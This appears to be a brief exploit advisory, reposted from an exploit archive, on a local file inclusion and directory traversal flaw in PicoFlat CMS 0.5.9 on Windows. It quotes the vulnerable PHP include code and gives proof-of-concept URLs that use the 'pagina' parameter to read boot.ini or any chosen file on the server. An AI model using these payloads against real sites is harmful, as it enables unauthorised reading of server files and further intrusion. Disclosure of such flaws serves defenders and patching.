PicoFlat CMS 0.5.9 Local File Inclusion Vulnerabilitty (win)

============================================================
PicoFlat CMS 0.5.9 Local File Inclusion Vulnerabilitty (win)
============================================================



---------------------------------------------------------------------------
type attacak:Local File inclusion and that the possibility of a
Directory traversal Windows disclosure boot.ini

site name picoflatcms 0.5.9

download http://picoflat.altervista.org/index.php?

by gmda


---------------------------------------------------------------------------

bug code

<?php             if (eregi('://', $pagina) || eregi('\?', $pagina)) {
                $pagina = "";
                include "notfound.php";
            }else{
                include $pagina;             }
        ?>

p.o.c

http://127.0.0.1/path/index.php?pagina=/./././././././boot.ini

http://127.0.0.1/path/index.php?pagina=[file]




#  0day.today [2018-01-10]  #